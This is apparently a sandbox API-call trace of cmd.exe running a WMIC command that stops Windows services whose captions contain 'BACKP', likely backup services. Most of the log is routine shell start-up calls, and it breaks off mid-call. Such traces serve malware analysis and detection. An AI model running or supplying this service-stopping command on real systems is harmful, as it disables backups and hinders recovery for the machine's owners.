lpBuffer=0x465f7e4, dwLength=0x1c | out: lpBuffer=0x465f7e4*(BaseAddress=0x4563000, AllocationBase=0x4560000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0109.332] VirtualQuery (in: lpAddress=0x4660000, lpBuffer=0x465f7e4, dwLength=0x1c | out: lpBuffer=0x465f7e4*(BaseAddress=0x4660000, AllocationBase=0x4660000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0109.332] GetConsoleOutputCP () returned 0x1b5 [0109.332] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0109.332] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0109.332] _get_osfhandle (_FileHandle=1) returned 0x3c [0109.332] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0109.333] _get_osfhandle (_FileHandle=1) returned 0x3c [0109.333] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0109.333] _get_osfhandle (_FileHandle=1) returned 0x3c [0109.333] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0109.333] _get_osfhandle (_FileHandle=0) returned 0x38 [0109.333] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0109.333] _get_osfhandle (_FileHandle=0) returned 0x38 [0109.333] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0109.333] GetEnvironmentStringsW () returned 0x47a7dd0* [0109.333] FreeEnvironmentStringsA (penv="A") returned 1 [0109.334] GetEnvironmentStringsW () returned 0x47a7dd0* [0109.334] FreeEnvironmentStringsA (penv="A") returned 1 [0109.334] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x465e790 | out: phkResult=0x465e790*=0x94) returned 0x0 [0109.334] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x465e794, lpData=0x465e79c, lpcbData=0x465e798*=0x1000 | out: lpType=0x465e794*=0x0, lpData=0x465e79c*=0xd8, lpcbData=0x465e798*=0x1000) returned 0x2 [0109.334] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x465e794, lpData=0x465e79c, lpcbData=0x465e798*=0x1000 | out: lpType=0x465e794*=0x4, lpData=0x465e79c*=0x1, lpcbData=0x465e798*=0x4) returned 0x0 [0109.334] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x465e794, lpData=0x465e79c, lpcbData=0x465e798*=0x1000 | out: lpType=0x465e794*=0x0, lpData=0x465e79c*=0x1, lpcbData=0x465e798*=0x1000) returned 0x2 [0109.334] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x465e794, lpData=0x465e79c, lpcbData=0x465e798*=0x1000 | out: lpType=0x465e794*=0x4, lpData=0x465e79c*=0x0, lpcbData=0x465e798*=0x4) returned 0x0 [0109.334] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x465e794, lpData=0x465e79c, lpcbData=0x465e798*=0x1000 | out: lpType=0x465e794*=0x4, lpData=0x465e79c*=0x40, lpcbData=0x465e798*=0x4) returned 0x0 [0109.334] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x465e794, lpData=0x465e79c, lpcbData=0x465e798*=0x1000 | out: lpType=0x465e794*=0x4, lpData=0x465e79c*=0x40, lpcbData=0x465e798*=0x4) returned 0x0 [0109.334] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x465e794, lpData=0x465e79c, lpcbData=0x465e798*=0x1000 | out: lpType=0x465e794*=0x0, lpData=0x465e79c*=0x40, lpcbData=0x465e798*=0x1000) returned 0x2 [0109.334] RegCloseKey (hKey=0x94) returned 0x0 [0109.334] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x465e790 | out: phkResult=0x465e790*=0x94) returned 0x0 [0109.334] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x465e794, lpData=0x465e79c, lpcbData=0x465e798*=0x1000 | out: lpType=0x465e794*=0x0, lpData=0x465e79c*=0x40, lpcbData=0x465e798*=0x1000) returned 0x2 [0109.334] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x465e794, lpData=0x465e79c, lpcbData=0x465e798*=0x1000 | out: lpType=0x465e794*=0x4, lpData=0x465e79c*=0x1, lpcbData=0x465e798*=0x4) returned 0x0 [0109.334] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x465e794, lpData=0x465e79c, lpcbData=0x465e798*=0x1000 | out: lpType=0x465e794*=0x0, lpData=0x465e79c*=0x1, lpcbData=0x465e798*=0x1000) returned 0x2 [0109.334] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x465e794, lpData=0x465e79c, lpcbData=0x465e798*=0x1000 | out: lpType=0x465e794*=0x4, lpData=0x465e79c*=0x0, lpcbData=0x465e798*=0x4) returned 0x0 [0109.334] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x465e794, lpData=0x465e79c, lpcbData=0x465e798*=0x1000 | out: lpType=0x465e794*=0x4, lpData=0x465e79c*=0x9, lpcbData=0x465e798*=0x4) returned 0x0 [0109.334] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x465e794, lpData=0x465e79c, lpcbData=0x465e798*=0x1000 | out: lpType=0x465e794*=0x4, lpData=0x465e79c*=0x9, lpcbData=0x465e798*=0x4) returned 0x0 [0109.334] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x465e794, lpData=0x465e79c, lpcbData=0x465e798*=0x1000 | out: lpType=0x465e794*=0x0, lpData=0x465e79c*=0x9, lpcbData=0x465e798*=0x1000) returned 0x2 [0109.334] RegCloseKey (hKey=0x94) returned 0x0 [0109.334] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2981e [0109.334] srand (_Seed=0x5ad2981e) [0109.334] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE" [0109.334] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE" [0109.334] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0109.335] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x47a9d28, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0109.335] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0109.335] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.335] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0109.335] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0109.335] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0109.335] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0109.335] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0109.335] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0109.335] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0109.335] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0109.335] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0109.335] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0109.335] GetEnvironmentStringsW () returned 0x47a7dd0* [0109.335] FreeEnvironmentStringsA (penv="A") returned 1 [0109.335] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.335] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0109.335] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0109.335] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0109.335] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0109.335] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0109.335] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0109.335] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0109.335] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0109.335] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0109.335] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x465f568 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0109.336] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x465f568, lpFilePart=0x465f560 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x465f560*="Desktop") returned 0x1d [0109.336] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0109.336] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x465f2e8 | out: lpFindFileData=0x465f2e8) returned 0x47a05c8 [0109.336] FindClose (in: hFindFile=0x47a05c8 | out: hFindFile=0x47a05c8) returned 1 [0109.336] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x465f2e8 | out: lpFindFileData=0x465f2e8) returned 0x47a05c8 [0109.336] FindClose (in: hFindFile=0x47a05c8 | out: hFindFile=0x47a05c8) returned 1 [0109.336] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0109.336] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x465f2e8 | out: lpFindFileData=0x465f2e8) returned 0x47a05c8 [0109.336] FindClose (in: hFindFile=0x47a05c8 | out: hFindFile=0x47a05c8) returned 1 [0109.336] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0109.336] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0109.336] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0109.336] GetEnvironmentStringsW () returned 0x47a7dd0* [0109.336] FreeEnvironmentStringsA (penv="=") returned 1 [0109.336] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0109.337] GetConsoleOutputCP () returned 0x1b5 [0109.337] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0109.337] GetUserDefaultLCID () returned 0x409 [0109.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0109.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x465f698, cchData=128 | out: lpLCData="0") returned 2 [0109.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x465f698, cchData=128 | out: lpLCData="0") returned 2 [0109.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x465f698, cchData=128 | out: lpLCData="1") returned 2 [0109.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0109.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0109.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0109.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0109.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0109.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0109.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0109.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0109.338] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0109.338] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0109.338] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0109.339] GetConsoleTitleW (in: lpConsoleTitle=0x47aaa98, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.339] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0109.339] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0109.339] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0109.339] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0109.340] GetEnvironmentVariableW (in: lpName="BACKP", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0109.340] _wcsicmp (_String1="BACKP", _String2="CD") returned -1 [0109.340] _wcsicmp (_String1="BACKP", _String2="ERRORLEVEL") returned -3 [0109.340] _wcsicmp (_String1="BACKP", _String2="CMDEXTVERSION") returned -1 [0109.340] _wcsicmp (_String1="BACKP", _String2="CMDCMDLINE") returned -1 [0109.340] _wcsicmp (_String1="BACKP", _String2="DATE") returned -2 [0109.340] _wcsicmp (_String1="BACKP", _String2="TIME") returned -18 [0109.340] _wcsicmp (_String1="BACKP", _String2="RANDOM") returned -16 [0109.340] _wcsicmp (_String1="BACKP", _String2="HIGHESTNUMANODENUMBER") returned -6 [0109.340] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0109.340] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0109.340] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0109.340] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0109.340] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0109.340] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0109.340] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0109.341] GetConsoleTitleW (in: lpConsoleTitle=0x465f380, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.342] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0109.342] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0109.342] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0109.342] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0109.342] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0109.342] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0109.342] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0109.342] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0109.342] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0109.342] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0109.342] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0109.342] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0109.342] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0109.342] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0109.342] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0109.342] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0109.342] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0109.342] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0109.342] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0109.342] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0109.342] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0109.342] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0109.342] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0109.342] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0109.342] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0109.342] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0109.342] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0109.342] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0109.342] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0109.342] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0109.342] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0109.342] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0109.342] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0109.342] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0109.342] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0109.342] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0109.342] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0109.342] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0109.342] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0109.342] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0109.342] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0109.343] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0109.343] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0109.343] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0109.343] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0109.343] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0109.343] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0109.343] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0109.343] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0109.343] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0109.343] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0109.343] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0109.343] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0109.343] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0109.343] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0109.343] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0109.343] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0109.343] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0109.343] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0109.343] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0109.343] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0109.343] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0109.343] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0109.343] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0109.343] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0109.343] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0109.343] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0109.343] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0109.343] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0109.343] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0109.343] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0109.343] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0109.343] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0109.343] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0109.343] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0109.343] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0109.343] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0109.343] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0109.343] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0109.343] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0109.343] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0109.343] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0109.343] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0109.343] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0109.343] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0109.343] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0109.343] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0109.344] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0109.344] SetErrorMode (uMode=0x0) returned 0x0 [0109.344] SetErrorMode (uMode=0x1) returned 0x0 [0109.344] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47a05d0, lpFilePart=0x465ee8c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x465ee8c*="Desktop") returned 0x1d [0109.344] SetErrorMode (uMode=0x0) returned 0x1 [0109.344] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0109.344] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0109.349] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.350] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.350] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x465ec18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x465ec18) returned 0xffffffff [0109.351] GetLastError () returned 0x2 [0109.351] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.351] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x465ec18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x465ec18) returned 0xffffffff [0109.351] GetLastError () returned 0x2 [0109.351] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.351] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x465ec18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x465ec18) returned 0xffffffff [0109.351] GetLastError () returned 0x2 [0109.351] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.351] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x465ec18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x465ec18) returned 0xffffffff [0109.351] GetLastError () returned 0x2 [0109.351] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.351] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x465ec18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x465ec18) returned 0x47ab220 [0109.351] FindClose (in: hFindFile=0x47ab220 | out: hFindFile=0x47ab220) returned 1 [0109.351] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x465ec18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x465ec18) returned 0xffffffff [0109.352] GetLastError () returned 0x2 [0109.352] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x465ec18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x465ec18) returned 0x47ab220 [0109.352] FindClose (in: hFindFile=0x47ab220 | out: hFindFile=0x47ab220) returned 1 [0109.352] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0109.352] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0109.352] GetConsoleTitleW (in: lpConsoleTitle=0x465f10c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.352] InitializeProcThreadAttributeList (in: lpAttributeList=0x465f038, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x465f01c | out: lpAttributeList=0x465f038, lpSize=0x465f01c) returned 1 [0109.352] UpdateProcThreadAttribute (in: lpAttributeList=0x465f038, dwFlags=0x0, Attribute=0x60001, lpValue=0x465f024, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x465f038, lpPreviousValue=0x0) returned 1 [0109.352] GetStartupInfoW (in: lpStartupInfo=0x465f070 | out: lpStartupInfo=0x465f070*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", 